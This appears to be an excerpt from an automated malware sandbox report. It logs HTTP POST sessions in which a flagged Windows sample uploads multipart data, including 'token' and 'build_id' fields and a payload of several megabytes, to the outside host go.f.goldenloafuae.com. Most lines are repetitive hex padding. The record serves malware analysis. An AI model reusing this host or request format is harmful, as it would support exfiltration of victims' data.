                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:01 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:46:01 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.44975795.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:46:02 UTC298OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----je3ekxb1dtjw47ymgl6f
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 131557
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:46:02 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6a 65 33 65 6b 78 62 31 64 74 6a 77 34 37 79 6d 67 6c 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 6a 65 33 65 6b 78 62 31 64 74 6a 77 34 37 79 6d 67 6c 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 6a 65 33 65 6b 78 62 31 64 74 6a 77 34 37 79 6d 67 6c 36 66 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------je3ekxb1dtjw47ymgl6fContent-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------je3ekxb1dtjw47ymgl6fContent-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------je3ekxb1dtjw47ymgl6fCont
                                                                                    2025-03-07 19:46:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:02 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:04 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:46:04 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:46:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.44975895.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:46:04 UTC299OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----kngv3e3wlfk68yusriec
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 6990993
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:46:04 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6b 6e 67 76 33 65 33 77 6c 66 6b 36 38 79 75 73 72 69 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 6b 6e 67 76 33 65 33 77 6c 66 6b 36 38 79 75 73 72 69 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 6b 6e 67 76 33 65 33 77 6c 66 6b 36 38 79 75 73 72 69 65 63 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------kngv3e3wlfk68yusriecContent-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------kngv3e3wlfk68yusriecContent-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------kngv3e3wlfk68yusriecCont
                                                                                    2025-03-07 19:46:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
